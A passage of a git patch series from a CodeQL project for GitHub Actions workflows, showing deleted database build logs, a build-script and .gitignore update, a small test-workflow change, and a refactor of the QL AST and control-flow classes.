"extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml" - } - ], - "csharp" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csharp", - "extractor_options" : { - "trap" : { - "title" : "Options pertaining to TRAP.", - "description" : "Options pertaining to TRAP.", - "type" : "object", - "properties" : { - "compression" : { - "title" : "Controls compression for the TRAP files written by the extractor.", - "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'brotli' (the default, to write brotli-compressed TRAP), 'gzip', and 'none' (to write uncompressed TRAP).\n", - "type" : "string", - "pattern" : "^(none|gzip|brotli)$" - } - } - }, - "buildless" : { - "title" : "Whether to use buildless (standalone) extraction.", - "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", - "type" : "string", - "pattern" : "^(false|true)$" - }, - "cil" : { - "title" : "Whether to enable CIL extraction.", - "description" : "A value indicating, whether CIL extraction should be enabled. The default is 'true'.\n", - "type" : "string", - "pattern" : "^(false|true)$" - } - } - } - ], - "javascript" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/javascript", - "extractor_options" : { - "skip_types" : { - "title" : "Skip type extraction for TypeScript", - "description" : "Whether to skip the extraction of types in a TypeScript application", - "type" : "string", - "pattern" : "^(false|true)$" - } - } - } - ], - "ruby" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/ruby", - "extractor_options" : { - "trap" : { - "title" : "Options pertaining to TRAP.", - "description" : "Options pertaining to TRAP.", - "type" : "object", - "properties" : { - "compression" : { - "title" : "Controls compression for the TRAP files written by the extractor.", - "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'gzip' (the default, to write gzip-compressed TRAP) and 'none' (to write uncompressed TRAP).\n", - "type" : "string", - "pattern" : "^(none|gzip)$" - } - } - } - } - } - ] - } - } -[2024-02-03 10:17:52] [PROGRESS] database init> Calculating baseline information in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test -[2024-02-03 10:17:52] [SPAMMY] database init> Ignoring the following directories when processing baseline information: .git, .hg, .svn. -[2024-02-03 10:17:52] [DETAILS] database init> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/tools/osx64/scc --by-file --exclude-dir .git,.hg,.svn --format json --no-large --no-min . -[2024-02-03 10:17:52] [PROGRESS] database init> Calculated baseline information for languages: (387ms). -[2024-02-03 10:17:52] [PROGRESS] database init> Resolving extractor yaml. -[2024-02-03 10:17:52] [DETAILS] database init> Found candidate extractor root for yaml: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. -[2024-02-03 10:17:52] [PROGRESS] database init> Successfully loaded extractor YAML (yaml) from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. -[2024-02-03 10:17:52] [PROGRESS] database init> Created skeleton CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db. This in-progress database is ready to be populated by an extractor. -[2024-02-03 10:17:52] Plumbing command codeql database init completed. -[2024-02-03 10:17:52] [PROGRESS] database create> Running build command: [] -[2024-02-03 10:17:52] Running plumbing command: codeql database trace-command --working-dir=/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test --index-traceless-dbs --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db -[2024-02-03 10:17:52] Using autobuild script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh. -[2024-02-03 10:17:52] [PROGRESS] database trace-command> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh] -[2024-02-03 10:17:52] [build-stderr] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... -[2024-02-03 10:17:53] [build-stderr] /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... -[2024-02-03 10:17:53] [build-stderr] Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/working/files-to-index11251721875757902238.list] -[2024-02-03 10:17:53] Plumbing command codeql database trace-command completed. -[2024-02-03 10:17:53] [PROGRESS] database create> Finalizing database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db. -[2024-02-03 10:17:53] Running plumbing command: codeql database finalize --mode=trim --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db -[2024-02-03 10:17:53] [PROGRESS] database finalize> Running TRAP import for CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db... -[2024-02-03 10:17:53] Running plumbing command: codeql dataset import --dbscheme=/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/yaml.dbscheme -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/trap/yaml -[2024-02-03 10:17:53] Clearing disk cache since the version file /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml/default/cache/version does not exist -[2024-02-03 10:17:53] Tuple pool not found. Clearing relations with cached strings -[2024-02-03 10:17:53] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml/default/cache in mode clear. -[2024-02-03 10:17:53] Sequence stamp origin is -6222583521912648850 -[2024-02-03 10:17:53] Pausing evaluation to hard-clear memory at sequence stamp o+0 -[2024-02-03 10:17:53] Unpausing evaluation -[2024-02-03 10:17:53] Pausing evaluation to quickly trim disk at sequence stamp o+1 -[2024-02-03 10:17:53] Unpausing evaluation -[2024-02-03 10:17:53] Pausing evaluation to zealously trim disk at sequence stamp o+2 -[2024-02-03 10:17:53] Unpausing evaluation -[2024-02-03 10:17:53] Trimming completed (7ms): Purged everything. -[2024-02-03 10:17:53] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/trap/yaml -[2024-02-03 10:17:53] Found 8 TRAP files (16.41 KiB) -[2024-02-03 10:17:53] [PROGRESS] dataset import> Importing TRAP files -[2024-02-03 10:17:53] Importing changed-files.yml.trap.gz (1 of 8) -[2024-02-03 10:17:53] Importing inter1.yml.trap.gz (2 of 8) -[2024-02-03 10:17:53] Importing no-flow1.yml.trap.gz (3 of 8) -[2024-02-03 10:17:53] Importing no-flow2.yml.trap.gz (4 of 8) -[2024-02-03 10:17:53] Importing simple1.yml.trap.gz (5 of 8) -[2024-02-03 10:17:53] Importing simple2.yml.trap.gz (6 of 8) -[2024-02-03 10:17:53] Importing test.yml.trap.gz (7 of 8) -[2024-02-03 10:17:53] Importing sourceLocationPrefix.trap.gz (8 of 8) -[2024-02-03 10:17:53] [PROGRESS] dataset import> Merging relations -[2024-02-03 10:17:53] Merging 1 fragment for 'files'. -[2024-02-03 10:17:53] Merged 56 bytes for 'files'. -[2024-02-03 10:17:53] Merging 1 fragment for 'folders'. -[2024-02-03 10:17:53] Merged 80 bytes for 'folders'. -[2024-02-03 10:17:53] Merging 1 fragment for 'containerparent'. -[2024-02-03 10:17:53] Merged 128 bytes for 'containerparent'. -[2024-02-03 10:17:53] Merging 1 fragment for 'yaml_scalars'. -[2024-02-03 10:17:53] Merged 3048 bytes (2.98 KiB) for 'yaml_scalars'. -[2024-02-03 10:17:53] Merging 1 fragment for 'yaml'. -[2024-02-03 10:17:53] Merged 7992 bytes (7.80 KiB) for 'yaml'. -[2024-02-03 10:17:53] Merging 1 fragment for 'locations_default'. -[2024-02-03 10:17:53] Merged 7992 bytes (7.80 KiB) for 'locations_default'. -[2024-02-03 10:17:53] Merging 1 fragment for 'yaml_locations'. -[2024-02-03 10:17:53] Merged 2664 bytes (2.60 KiB) for 'yaml_locations'. -[2024-02-03 10:17:53] Merging 1 fragment for 'sourceLocationPrefix'. -[2024-02-03 10:17:53] Merged 4 bytes for 'sourceLocationPrefix'. -[2024-02-03 10:17:53] Saving string and id pools to disk. -[2024-02-03 10:17:54] Finished importing TRAP files. -[2024-02-03 10:17:54] Read 77.48 KiB of uncompressed TRAP data. -[2024-02-03 10:17:54] Relation data size: 21.45 KiB (merge rate: 1.20 MiB/s) -[2024-02-03 10:17:54] String pool size: 2.05 MiB -[2024-02-03 10:17:54] ID pool size: 1.03 MiB -[2024-02-03 10:17:54] [PROGRESS] dataset import> Finished writing database (relations: 21.45 KiB; string pool: 2.05 MiB). -[2024-02-03 10:17:54] Pausing evaluation to close the cache at sequence stamp o+3 -[2024-02-03 10:17:54] The disk cache is freshly trimmed; leave it be. -[2024-02-03 10:17:54] Unpausing evaluation -[2024-02-03 10:17:54] Plumbing command codeql dataset import completed. -[2024-02-03 10:17:54] [PROGRESS] database finalize> TRAP import complete (817ms). -[2024-02-03 10:17:54] Running plumbing command: codeql database cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db -[2024-02-03 10:17:54] [PROGRESS] database cleanup> Cleaning up existing TRAP files after import... -[2024-02-03 10:17:54] [PROGRESS] database cleanup> TRAP files cleaned up (6ms). -[2024-02-03 10:17:54] [PROGRESS] database cleanup> Cleaning up scratch directory... -[2024-02-03 10:17:54] [PROGRESS] database cleanup> Scratch directory cleaned up (0ms). -[2024-02-03 10:17:54] Running plumbing command: codeql dataset cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml -[2024-02-03 10:17:54] [PROGRESS] dataset cleanup> Cleaning up dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml. -[2024-02-03 10:17:54] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml/default/cache in mode trim. -[2024-02-03 10:17:54] Sequence stamp origin is -6222583518558519910 -[2024-02-03 10:17:54] Pausing evaluation to zealously trim disk at sequence stamp o+0 -[2024-02-03 10:17:54] Unpausing evaluation -[2024-02-03 10:17:54] Trimming completed (2ms): Trimmed disposable data from cache. -[2024-02-03 10:17:54] Pausing evaluation to close the cache at sequence stamp o+1 -[2024-02-03 10:17:54] The disk cache is freshly trimmed; leave it be. -[2024-02-03 10:17:54] Unpausing evaluation -[2024-02-03 10:17:54] [PROGRESS] dataset cleanup> Trimmed disposable data from cache. -[2024-02-03 10:17:54] [PROGRESS] dataset cleanup> Finalizing dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml -[2024-02-03 10:17:54] [DETAILS] dataset cleanup> Finished deleting ID pool from /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml (4ms). -[2024-02-03 10:17:54] Plumbing command codeql dataset cleanup completed. -[2024-02-03 10:17:54] Plumbing command codeql database cleanup completed with status 0. -[2024-02-03 10:17:54] [PROGRESS] database finalize> Finished zipping source archive (3.73 KiB). -[2024-02-03 10:17:54] Plumbing command codeql database finalize completed. -[2024-02-03 10:17:54] [PROGRESS] database create> Successfully created database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db. -[2024-02-03 10:17:54] Terminating normally. diff --git a/ql/src/test-db/log/database-index-files-20240203.101752.962.log b/ql/src/test-db/log/database-index-files-20240203.101752.962.log deleted file mode 100644 index f410634a29f..00000000000 --- a/ql/src/test-db/log/database-index-files-20240203.101752.962.log +++ /dev/null @@ -1,21 +0,0 @@ -[2024-02-03 10:17:52] This is codeql database index-files --include-extension=.yaml --include-extension=.yml --size-limit=5m --language=yaml /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db -[2024-02-03 10:17:52] Log file was started late. -[2024-02-03 10:17:52] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh. -[2024-02-03 10:17:52] [PROGRESS] database index-files> Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... -[2024-02-03 10:17:52] Calling plumbing command: codeql resolve files --include-extension=.yaml --include-extension=.yml --size-limit=5m /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test --format=json -[2024-02-03 10:17:53] [PROGRESS] resolve files> Scanning /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... -[2024-02-03 10:17:53] Plumbing command codeql resolve files completed: - [ - "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/changed-files.yml", - "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/inter1.yml", - "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/test.yml", - "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/no-flow1.yml", - "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/no-flow2.yml", - "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/simple1.yml", - "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/simple2.yml" - ] -[2024-02-03 10:17:53] [DETAILS] database index-files> Found 7 files. -[2024-02-03 10:17:53] [PROGRESS] database index-files> /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... -[2024-02-03 10:17:53] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh. -[2024-02-03 10:17:53] [PROGRESS] database index-files> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/working/files-to-index11251721875757902238.list] -[2024-02-03 10:17:53] Terminating normally. diff --git a/ql/src/test-db/src.zip b/ql/src/test-db/src.zip deleted file mode 100644 index 9c82ac3a64444a993e3a461dc000184a22d1e3a8..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 3816 zcmcImc{r4N8y@S7B{SK=NTkh#nL(1VrA-ZHjHS`3oUF~53^Qa2O^Bj=jVy6c985U& zeHn+5eG6p`2PGa)KF_JzvD?24Noy;#teq+~c`=vh_tIRa?!WW!^|NG ziWLj;R3$WF@PRVmbLC@G8WJxWF2*{5-xFje*R*S{jZdE!ql66TQQ9{;;m$p;g*`U? zCf-^uQULUp%4!G#7t#!jL?f3H3JPDSywe@G3Sk`M`KxcmY65Byc)29G{#GqkqAbEv z_ng;paJl96up=4?$D13oqYYH=$tX04R*c*Yqk$xLHp8l3-mDwm4Uu{KMEcU^u3gX# z!xx#WWf>W7TI-dIB}04f1e(e4t>hI9z8ue)cz6qw6;6Lea%lDGDGZNGtG7AwAL;$d z_%CBH?e2xzWTU{3A2;RQO(K$7&6u6jm%dyH!x!`u;{Dg>`{LVY3IL9DTDgZg^N#94 z*CqE@WSSR{BO3LW9ZYSuXr(_D4YNI>xsX*HNo3EjvRPtlOoI>*=JMeK_F|@4QW#A) zyUM2rb*sJ2f0fL5u3(%Q5_PjAHz+qmGr^lY{2oe?39in9*jVIC0!V8~wQDN^2>ynM zy$2&}R^(CRbS56Lr1de1U%sYC<`E08@P{s~x>3f*T;I|9x)Y47^e!PQGxe_1vm|wi zb4$N_v@O(XE<5{WmIzv1+7Z&i7kB42ZWOGYb3x-%dU93CdT735FUBS2*P-Ps)=2wm zM)50TTmFfn0hpjaDABSoHti&64$R>kVNKRrW;2?|=KbG|vb~(EajfD;$B8>eN*?qce$ue!L(J+@SJcsb!3LQK2&|CQ38rj9$My9!!WL8M7K2DVLhA zSHeZ$_miDJgeu@rV=2`E4`4*6+IZckS!lPs8`^&Ymb827AY2lsEW;u$m@0PgrzWnR z<`F+XIW?JY;M#PU_2B)Kn_@QqY5)GZJsTL}t8nbGkmiaBxiBD;>qx$D`+~238nQ0h zaQ0EJH=L^bL-{6)K6o0m3*?rv^pObUHz{yS3n9NvtUa3fEWg-iQL2NM!zq;v92kgeCd_Oa$Z2Xx)n=E4=#)}}a*w7AZFMEF=}qop6) za0L9AouzYg%1HQ}>K$v5(#jyc`WRW?<9tpn3C!|jR zNaAL1osGGZI}M1W>$WD{Bo8jhChyDekBPhiC92@lAf5TjO5i=@ikX8=lgk2{Heh%O zR9K?BeN>{LbmxgpX+q+|Qt8-QT5dM*%|>*{gy9R>;=xftjm-tdIc2BV; z-O9&+8>eCsiLz~Pq+%>5%y6BYNyKtJ=8$#+>+qZyg zTx01;?Jbr*$VUX>PK}fB5BQ6yN~#qNRQ~GWXXoxo8r(Iryl97ZIn>ujcv3Y6x_x+Y zQA$O=^tA+Q5<2PDlEbaWOc}#$f=L%cu-d>>&o*7j9X>q76n|K#ty|j8I-=^-r@kJX z0=N@eVXe20T1U`mQ=J@m=}$tJwN9xMqL8a@GhqyeZ!XI zei0gIM00*jBIy)G2jAaso_FZtBjf7nw%O>C%zmG|3wqhn+2$sllbcGRB`@jL^EG;J z`n}cVWRV(VXQ#Oi?_=eaJ-O+Y5s7?I# Date: Mon, 5 Feb 2024 10:48:53 +0100 Subject: [PATCH 0005/1267] Add testproj to gitignore --- .gitignore | 1 + 1 file changed, 1 insertion(+) diff --git a/.gitignore b/.gitignore index e43b0f98895..1233930f4a4 100644 --- a/.gitignore +++ b/.gitignore @@ -1 +1,2 @@ .DS_Store +**/*.testproj From 3902a55fbba9a86b3a85113196f3c219f29428ca Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Feb 2024 10:52:17 +0100 Subject: [PATCH 0006/1267] Update build test db script --- build-dbs.sh | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/build-dbs.sh b/build-dbs.sh index dac4753f4d6..073fcc40b44 100755 --- a/build-dbs.sh +++ b/build-dbs.sh @@ -1,5 +1,5 @@ #!/bin/bash -rm -rf ql/src/test-db || true -rm -rf ql/lib/test-db || true -codeql database create ql/src/test-db -l yaml -s ql/src/test -codeql database create ql/lib/test-db -l yaml -s ql/lib/test +rm -rf ql/src/test/test.testproj || true +rm -rf ql/lib/test/test.testproj || true +codeql database create ql/src/test/test.testproj -l yaml -s ql/src/test +codeql database create ql/lib/test/test.testproj -l yaml -s ql/lib/test From b3eae71f951733ff4a13828d37ed6977c7e92392 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Feb 2024 13:30:46 +0100 Subject: [PATCH 0007/1267] fix test --- ql/src/test/test.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/src/test/test.yml b/ql/src/test/test.yml index 8f9cbf3b644..554a09f2105 100644 --- a/ql/src/test/test.yml +++ b/ql/src/test/test.yml @@ -18,6 +18,7 @@ jobs: - id: step1 env: BODY: ${{ steps.step0.outputs.value}} + shell: powershell run: | Write-Output "::set-output name=MSG::$ENV{BODY}" - id: step2 From 0398fbd0d71cd0b456236c93154d92b07521a939 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Feb 2024 18:04:37 +0100 Subject: [PATCH 0008/1267] Refactor AST layer --- ql/lib/codeql/actions/Ast.qll | 202 ++++++++---------- .../actions/controlflow/internal/Cfg.qll | 63 +++--- .../codeql/actions/dataflow/FlowSources.qll | 24 +-- .../dataflow/internal/DataFlowPrivate.qll | 5 +- 4 files changed, 140 insertions(+), 154 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 967a969a6b7..d2c7fdd4501 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -1,37 +1,49 @@ private import codeql.actions.ast.internal.Actions private import codeql.Locations +/** + * Base class for the AST tree. + * Based on YamlNode from the Yaml library but making mapping values children of the mapping keys: + * eg: top: + * key: value + * According to the Yaml library, both `key` and `value` are direct children of `top` + * This Tree implementation makes `key` child od `top` and `value` child of `key` + */ class AstNode instanceof YamlNode { - AstNode getParentNode() { - if exists(YamlMapping m | m.maps(_, this)) - then exists(YamlMapping m | m.maps(result, this)) - else result = super.getParentNode() - } + AstNode getParentNode() { result = super.getParentNode() } - AstNode getAChildNode() { - if this instanceof YamlMapping - then this.(YamlMapping).maps(result, _) - else - if this instanceof YamlCollection - then result = super.getChildNode(_) - else - if this instanceof YamlScalar and exists(YamlMapping m | m.maps(this, _)) - then exists(YamlMapping m | m.maps(this, result)) - else none() - } - - AstNode getChildNodeByOrder(int i) { - result = - rank[i](Expression child, Location l | - child = this.getAChildNode() and - child.getLocation() = l - | - child - order by - l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() - ) - } + // AstNode getParentNode() { + // if exists(YamlMapping m | m.maps(_, this)) + // then exists(YamlMapping m | m.maps(result, this)) + // else result = super.getParentNode() + // } + AstNode getAChildNode() { result = super.getAChildNode() } + // AstNode getAChildNode() { + // if this instanceof YamlMapping + // then this.(YamlMapping).maps(result, _) + // else + // if this instanceof YamlCollection + // then result = super.getChildNode(_) + // else + // if this instanceof YamlScalar and exists(YamlMapping m | m.maps(this, _)) + // then exists(YamlMapping m | m.maps(this, result)) + // else none() + // } + // /** + // * This should be getAChildNode(int i) + // */ + // AstNode getChildNodeByOrder(int i) { + // result = + // rank[i](Expression child, Location l | + // child = this.getAChildNode() and + // child.getLocation() = l + // | + // child + // order by + // l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + // ) + // } string toString() { result = super.toString() } string getAPrimaryQlClass() { result = super.getAPrimaryQlClass() } @@ -39,15 +51,24 @@ class AstNode instanceof YamlNode { Location getLocation() { result = super.getLocation() } } -class Statement extends AstNode { - // narrow down to something that is a statement - // A statement is a group of expressions and/or statements that you design to carry out a task or an action. - // Any statement that can return a value is automatically qualified to be used as an expression. -} +/** + * A statement is a group of expressions and/or statements that you design to carry out a task or an action. + * Any statement that can return a value is automatically qualified to be used as an expression. + */ +class Statement extends AstNode { } -class Expression extends Statement { - // narrow down to something that is an expression - // An expression is any word or group of words or symbols that is a value. In programming, an expression is a value, or anything that executes and ends up being a value. +/** + * An expression is any word or group of words or symbols that is a value. In programming, an expression is a value, or anything that executes and ends up being a value. + */ +class Expression extends Statement { } + +/** + * A Github Actions Workflow + */ +class WorkflowStmt extends Statement instanceof Actions::Workflow { + JobStmt getAJob() { result = super.getJob(_) } + + JobStmt getJob(string id) { result = super.getJob(id) } } /** @@ -60,19 +81,17 @@ class JobStmt extends Statement instanceof Actions::Job { */ string getId() { result = super.getId() } - /** Gets the human-readable name of this job, if any, as a string. */ - string getName() { - result = super.getId() - or - not exists(string s | s = super.getId()) and result = "unknown" - } - /** Gets the step at the given index within this job. */ StepStmt getStep(int index) { result = super.getStep(index) } /** Gets any steps that are defined within this job. */ StepStmt getAStep() { result = super.getStep(_) } + /** + * Gets a needed job. + * eg: + * - needs: [job1, job2] + */ JobStmt getNeededJob() { exists(Actions::Needs needs | needs.getJob() = this and @@ -80,34 +99,35 @@ class JobStmt extends Statement instanceof Actions::Job { ) } - Expression getJobOutputExpr(string varName) { - this.(Actions::Job) - .lookup("outputs") - .(YamlMapping) - .maps(any(YamlScalar a | a.getValue() = varName), result) - } - - JobOutputStmt getJobOutputStmt() { result = this.(Actions::Job).lookup("outputs") } - - Statement getSuccNode(int i) { - result = - rank[i](Expression child, Location l | - (child = this.getAStep() or child = this.getJobOutputStmt()) and - l = child.getLocation() - | - child - order by - l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() - ) - } + /** + * Gets the declaration of the outputs for the job. + * eg: + * out1: ${steps.foo.bar} + * out2: ${steps.foo.baz} + */ + JobOutputStmt getOutputStmt() { result = this.(Actions::Job).lookup("outputs") } } +/** + * Declaration of the outputs for the job. + * eg: + * out1: ${steps.foo.bar} + * out2: ${steps.foo.baz} + */ class JobOutputStmt extends Statement instanceof YamlMapping { JobStmt job; JobOutputStmt() { job.(YamlMapping).lookup("outputs") = this } - StepOutputAccessExpr getSuccNode(int i) { result = this.(YamlMapping).getValueNode(i) } + YamlMapping asYamlMapping() { result = this } + + /** + * Gets a specific value expression + * eg: ${steps.foo.bar} + */ + Expression getOutputExpr(string id) { + this.(YamlMapping).maps(any(YamlScalar s | s.getValue() = id), result) + } } /** @@ -116,15 +136,7 @@ class JobOutputStmt extends Statement instanceof YamlMapping { class StepStmt extends Statement instanceof Actions::Step { string getId() { result = super.getId() } - string getName() { - result = super.getId() - or - not exists(string s | s = super.getId()) and result = "unknown" - } - JobStmt getJob() { result = super.getJob() } - - abstract AstNode getSuccNode(int i); } /** @@ -145,44 +157,12 @@ class UsesExpr extends StepStmt, Expression { result = with.lookup(key) ) } - - Expression getArgumentByOrder(int i) { - exists(Actions::With with | - with.getStep() = uses.getStep() and - result = - rank[i](Expression child, Location l | - child = with.lookup(_) and l = child.getLocation() - | - child - order by - l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() - ) - ) - } - - Expression getAnArgument() { - exists(Actions::With with | - with.getStep() = this and - result = with.lookup(_) - ) - } - - override AstNode getSuccNode(int i) { result = this.getArgumentByOrder(i) } } /** - * An argument passed to a UsesExpr. + * A Run step represents the evaluation of a provided script */ -class ArgumentExpr extends Expression { - UsesExpr uses; - - ArgumentExpr() { this = uses.getAnArgument() } -} - -/** - * A Run step represents a call to an inline script or executable on the runner machine. - */ -class RunExpr extends StepStmt { +class RunExpr extends StepStmt, Expression { Actions::Run scriptExpr; RunExpr() { scriptExpr.getStep() = this } @@ -190,12 +170,10 @@ class RunExpr extends StepStmt { Expression getScriptExpr() { result = scriptExpr } string getScript() { result = scriptExpr.getValue() } - - override AstNode getSuccNode(int i) { result = this.getScriptExpr() and i = 0 } } /** - * A YAML string containing a workflow expression. + * Evaluation of a workflow expression ${{}}. */ class ExprAccessExpr extends Expression instanceof YamlString { string expr; @@ -208,7 +186,7 @@ class ExprAccessExpr extends Expression instanceof YamlString { } /** - * A ExprAccessExpr where the expression references a step output. + * A ExprAccessExpr where the expression evaluated is a step output read. * eg: `${{ steps.changed-files.outputs.all_changed_files }}` */ class StepOutputAccessExpr extends ExprAccessExpr { @@ -230,7 +208,7 @@ class StepOutputAccessExpr extends ExprAccessExpr { } /** - * A ExprAccessExpr where the expression references a job output. + * A ExprAccessExpr where the expression evaluated is a job output read. * eg: `${{ needs.job1.outputs.foo}}` */ class JobOutputAccessExpr extends ExprAccessExpr { @@ -250,7 +228,7 @@ class JobOutputAccessExpr extends ExprAccessExpr { exists(JobStmt job | job.getId() = jobId and job.getLocation().getFile() = this.getLocation().getFile() and - job.getJobOutputExpr(varName) = result + job.getOutputStmt().getOutputExpr(varName) = result ) } } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 8b6696fe777..c549eb40198 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -139,31 +139,40 @@ private import CfgImpl private import Completion private import CfgScope -// Trees are what end up creating Cfg::Node objects and therefore DataFlow::Node objects. -// Its also required that there is parent/child relationships between nodes so orphans nodes will not appear as either Cfg::Node or DataFlow::Node. -// For example -// - ArgumentExpr should be children of UsesExpr, and UsesExpr should be children of StepStmt. -// TODO: We need to make VarAccess expressions part ot the tree as they are currently orphans -private class CfgNodeTree extends StandardPreOrderTree instanceof AstNode { - override AstNode getChildNode(int i) { result = super.getChildNodeByOrder(i) } +private class JobTree extends StandardPreOrderTree instanceof JobStmt { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + (child = super.getAStep() or child = super.getOutputStmt()) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } } -// private class JobStmtTree extends StandardPreOrderTree instanceof JobStmt { -// override ControlFlowTree getChildNode(int i) { result = super.getSuccNode(i) } -// } -// -// private class StepStmtTree extends StandardPreOrderTree instanceof StepStmt { -// override ControlFlowTree getChildNode(int i) { result = super.getSuccNode(i) } -// } -// -// private class JobOutputTree extends StandardPreOrderTree instanceof JobOutputStmt { -// override ControlFlowTree getChildNode(int i) { result = super.getSuccNode(i) } -// } -// -// // TODO: Do we need this or we can just care about the ExprAccessExpr -// private class ArgumentTree extends LeafTree instanceof ArgumentExpr { } -// -// private class ExprAccessTree extends LeafTree instanceof ExprAccessExpr { } -// -// private class StepOutputAccessTree extends LeafTree instanceof StepOutputAccessExpr { } -// -// private class JobOutputAccessTree extends LeafTree instanceof JobOutputAccessExpr { } \ No newline at end of file + +private class JobOutputTree extends StandardPreOrderTree instanceof JobOutputStmt { + override ControlFlowTree getChildNode(int i) { result = super.asYamlMapping().getValueNode(i) } +} + +private class UsesTree extends StandardPreOrderTree instanceof UsesExpr { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + child = super.getArgument(_) and l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class RunTree extends 